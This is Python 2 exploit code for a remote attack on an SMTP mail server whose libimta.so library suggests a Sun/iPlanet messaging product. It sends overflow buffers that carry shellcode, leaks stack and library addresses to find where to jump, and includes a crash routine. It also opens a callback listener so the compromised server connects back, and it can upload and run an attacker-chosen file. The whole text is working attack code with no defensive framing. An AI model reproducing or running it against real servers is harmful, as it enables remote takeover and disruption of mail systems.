def exploit(self): try: attempt = self.attempt except AttributeError: attempt = self.attempt = 1 nAttempts = self.nAttempts challenge = utils.buildBuffer(4, self.badBytes) shellcodeBuf = self.os.buildShellcodeBuffer(self, utils.buf2long(challenge)) bounceBuf = self.buildBounceBuffer() self.startNewMsg() sd = self.sd if ((attempt == self.nAttempts) and (1 == attempt)): print "\nSending exploit:" elif (attempt <= self.nAttempts): print "\nSending exploit (attempt %d of %d):" % (attempt, nAttempts) else: return 1 smtpUtils.sendMsg(sd, bounceBuf, shellcodeBuf) try: reply = smtpUtils.recvReply(sd) except smtpUtils.smtpServerCrashed, err: print "FAILURE!" print "Target crashed -- probably because we were not talking to " \ "the correct thread." self.attempt += 1 return self.exploit()
def crash(self): self.startNewMsg() sd = self.sd smtpUtils.sendMsg(sd, self.buildCrashBuffer(), self.buildCoverupBuffer()) try: smtpUtils.recvReply(sd) except smtpUtils.smtpServerCrashed, err: print "Successfully crashed the target." self.conn = 0 return 0
def stackTouch(self, target, bruteForce=False): print "\nLooking for a %s stack:" % self.version stackBase = self.stackBase leakBuf = self.buildStackLeakBuffer(target, stackBase) target.startNewMsg() sd = target.sd smtpUtils.sendMsg(sd, leakBuf) try: reply = smtpUtils.recvReply(sd) except smtpUtils.smtpError, err: err.printMsg(" looking for a %s stack" % self.version) return 1
if (None == self.imtaBase): imtaBase = 0xfe800000L else: imtaBase = self.imtaBase try: leakBuf, matchBuf = self.buildImtaLeakBuffers(imtaBase) except IndexError, err: print "out of addrs" #self.crash() #connect #ehlo #self.conn = 0 #leakBuf, matchBuf = self.buildImtaLeakBuffers(imtaBase) self.startNewMsg() sd = self.sd smtpUtils.sendMsg(sd, leakBuf) try: reply = smtpUtils.recvReply(sd) except smtpUtils.smtpError, err: err.printMsg("") return 1 if (matchBuf != reply): print "Target replied with:" utils.dumpHex(reply) print "Expected:" utils.dumpHex(matchBuf) sd.close() return 1 print "Found libimta.so at 0x%08x." % imtaBase self.imtaBase = imtaBase return 0
def doExploit(parms): target = targets.factory(parms.get('target', None), badBytes) if (None == target): print "No target OS specified." return -1 cport = parms.get('cport', None) clport = parms.get('clport', None); if (None == cport): ld, cport = bindCallbackListener(cport, clport) else: ld = bindCallbackListener(cport, clport) cip = parms.get('cip') callback.cip = socket.inet_aton(cip) callback.cport = utils.u16ToBeU16String(cport) authCode = utils.randomBase64(4,6) callback.authCode = authCode ufile = parms.get('upload', None) if (None != ufile): tmpnam = parms.get('tmpnam', None) if (None == tmpnam): tmpnam = utils.tmpnam() efile = parms.get('exec', None) if ((None != efile) and not (os.access(efile, os.F_OK or os.X_OK))): print "%s either does not exist or is not executable" % efile ld.close() return -1 fd = open(ufile, 'r') ufileContents = fd.read() fd.close() mask = chr(random.randint(0,255)) upload.data = mask # okay, so I mean upload.mask, but oh well upload.tmpnam = tmpnam + "\0" unencoded = callback.build() + upload.build() else: unencoded = callback.build() + interactive.build() encoded = dulEncode(unencoded) domain = parms.get("domain", None) if (None == domain): domain = utils.buildBuffer(0xe, badBytes) senderBegin = '\"' + utils.buildBuffer(3, badBytes) senderEnd = "\"@" + domain recipient = parms.get('recipient') finderValue = utils.buildBuffer(4, badBytes) sender2 = target.buildSender2(finderValue) if (None == sender2): print "Error building exploit message." ld.close() return -1 body = finderValue + encoded tip = parms.get('tip') tport = parms.get('tport') sd, banner = smtpUtils.connect(tip, tport, True) print banner.strip() if (None == re.compile(target.banner).search(banner)): print "The target's banner does not match expected banner." response = ' ' while (("y" != response[0]) and ("n" != response[0])): response = string.lower(raw_input("Continue [y/N]? ")); if ('' == response): response = "n" if ("n" == response[0]): sys.exit() smtpUtils.helo(sd, domain, validResponse) sent = 0 maxLen = 0xff - len(senderBegin) - len(senderEnd) chop = maxLen % 4 maxLen -= chop atimeout = parms.get('atimeout', None) if ("None" == atimeout): atimeout = None print "Sending a maximum of %d messages..." % (maxLen // 4) for fillLen in range(maxLen, 0, -4): # poll to see if we've received a callback status, ad = waitForCallback(ld, authCode, 0, atimeout) if (1 != status): smtpUtils.quit(sd) print "Sent %d messages." % sent break # send a new message sender1 = senderBegin senderBody = target.buildSender1(fillLen) if (None == senderBody): ld.close() return -1 sender1 += senderBody sender1 += senderEnd try: smtpUtils.mailFrom(sd, sender1, validResponse) smtpUtils.rcptTo(sd, recipient, validResponse) except smtpUtils.smtpError, err: err.printMsg() print "\nSent %d messages." % sent ld.close() return -1 smtpUtils.data(sd) smtpUtils.sendMsg(sd, "From: " + sender2, "Keywords: " + body) buf = smtpUtils.recvReply(sd).strip() print "%s:\t%s" % (hex(fillLen), buf) sent += 1